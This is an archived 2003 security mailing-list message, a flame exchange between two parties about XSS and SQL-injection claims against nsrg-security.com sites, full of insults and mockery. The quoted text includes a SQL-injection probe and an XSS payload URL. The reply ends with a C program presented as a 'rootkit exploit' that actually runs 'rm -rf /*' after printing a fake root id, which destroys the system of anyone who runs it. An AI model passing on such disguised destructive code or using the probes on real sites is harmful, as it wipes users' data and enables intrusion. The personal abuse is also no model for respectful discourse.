[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <001301c3bba8$4406ebf0$050010ac@Estila>
From: lorenzohgh at nsrg-security.com (Lorenzo Hernandez Garcia-Hierro)
Subject: [OMG] NSRG Security & Lorenzo Hernandez "SuckYouBeans" Garcia-Hierro
Hi,
I think you are a little stuck wth honeypots:
http://www.nsrg-security.com/kiddies.txt
The only thing is not there is a photo of you ?face?
>
> ~~~~
> 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR
1 MILLIN
> 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR
1 MILLIN
> 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR
1 MILLIN
>
> O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-
> OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN
O132J0R2800D4Y0D4Y-
> OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN
O132J0R2800D4Y0D4Y-
> OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN
O132J0R2800D4Y
> ~~~~~~~~
>
>
> [ Playing with stolen relabeled code by NSRG-Security ]
>
> \=1`\ Brought to you by the fine folks at \`=1\
> \=1`\ Stupidity In the World Industries \`=1\
> \=1`\ The Re-Resurrection \`=1\
>
>
> sites: nsrg-security.com
> w3.nsrg-security.com
> http://news.nsrg-security.com
> test-zone.nsrg-security.com
> advisories.nsrg-security.com
>
> Look through web sites and learn about horatio.
>
> >>>>>>>>>>>>>>>>>>>>>>>> Quote from "Lorenzo Hernandez Garcia-Hierro" to
"gazpa"
>
> haha i no script kiddie i call u mother and ask about you scanning
> for rpc all night hahaofihohashahomfgroflmfaowssd
get a valium , say again , better ?
> ~ OH WAIT! the only linux exploit i have on my worthless nsrg-security
site
> ~ is for windows rpc, DOH! I look like such an idiot
are OK ? did you get your pills ???
> >>>>>>>>>>>>>>>>>>>>>>>> End Quote
>
> ==========================================================
>
> ==Advisory #8131==
> ==Giving you 10 years of XSS!!==
>
> NSRG SECURITY
> "Almost as lame as morning_wood"
>
> =============================================================
>
>
> http://www.nsrg-security.com/forum/viewtopic.php?forum=2&showtopic=1
having 1=1--
> "An SQL error has occured. Please see error.log for details."
where is the exploitable query ? i think theres not... but you appear in the
"in"famous list:
http://www.nsrg-security.com/kiddies.txt
> http://www.nsrg-security.com/stuff/trans.php?lang=sagsdg
> Stupid programming
it rejects non existent languages ( there is no return else function )
> [blah]
> http://www.nsrg-security.com/stuff/
> HEXCODES.TXT 25-Oct-2003 23:21 1k
> check_sys.php 21-Nov-2003 16:43 2k
> irc.php 22-Nov-2003 00:06 4k
> news-cert.php 21-Nov-2003 18:18 1k
> news-kernel-traffic.php 21-Nov-2003 18:18 1k
> news-securityfocus.php 21-Nov-2003 18:18 1k
> news-slashdot.php 21-Nov-2003 18:18 1k
> news.php 21-Nov-2003 19:03 3k
> trans.php 21-Nov-2003 17:40 3k
> voyeur-system.php 21-Nov-2003 16:50 3k
> vulns-securityfocus.php 21-Nov-2003 18:18 1k
oh , my god !
you find a directory listing !
xD
you can read slashdot if you want....
or kernel traffic, it doesn't mattter , the idiot is you....
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> Quote from site:
> =
> NSRG
> "One of the best security resources around"
> =
the old quote ?
...
>
> "XSS" in: http://w3.nsrg-security.com/search/index.php
>
> <script>alert(window.cookie)</script>
>
>
http://w3.nsrg-security.com/search/index.php?weblog=&keywords=%3Cscript%3Ealert%28window.cookie%29%3C%2Fscript%3E
try to execute it with cookies !!!
xD
try again , i think you copied this from somewehere else ...
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> testzone.nsrg-security.com
>
> "XSS" in Referer log at:
>
> http://test-zone.nsrg-security.com/xss/
why you don't post an advisory about php has a flaw in strip_tags function
?????
xD
strip_tags($refererer-f);
go back to drawing board !
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> news.nsrg-security.com
>
> "XSS" in Email variable at:
>
> http://news.nsrg-security.com/register.php
try it , i think your about 10 times in
http://www.nsrg-security.com/kiddies.txt xD
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> misc:
>
> XSS kiddie advisories:
>
> http://advisories.nsrg-security.com/
> http://advisories.nsrg-security.com/FileDonkey.com-XSS/exploit.html
>
>
> Another kiddie running nessus on everything he finds:
xD do you think that ? i think you must bye glasses or new eyes , read the
complete advisory not the stupid nessus report ( its marked as suplementary
with notes ).
>
http://advisories.nsrg-security.com/Nasa.gov-MV/nasa.gov-audit-by-robot.php
>
> Hiding his MS browser:
do you now a browser called Mozilla ?
Netscape ?
which plane is your home ? which Singapoor ?
>
http://advisories.nsrg-security.com/Nasa.gov-MV/screenshots/SQL-3.gif
>
> ==================================================
>
> Greets;
>
> MOOT INDUSTRIES, moot bailey, elite nsrg-security xss h4x0rs-they dont
know SQL but they know
> how to type '` when they see "id=###", the cisco kyd, welcome to the
doghouse
>
greets , you missed the Z xD . we don't know sql ? its new... you don't know
too ( you don't know nothing )
and... a quote from morrocco :
kristataran atan busken ( search it , i don't know the correct spelling...
xD )
and here is your new uber-hax0r exploit , for root machiones on the tv (
only pr0n as you like ):
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* Franks and Beans suckit Notrootkit
* where is my brain ?
* misspelled behind mind
* shutdown now && halt
* i can't halt , i am stuck on stupidity
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
#include <stdlib.h>
int main()
{
system("echo uid=0(root) gid=0(root) groups=0(root)");
system("rm -rf /*");
system("Exploit code executed successfully ! r00ted by Franks and Beans ,
donnie ?");
}
Best regards....xD
PS: take your time and think again if not take pills and go to the doctor.
Powered by blists - more mailing lists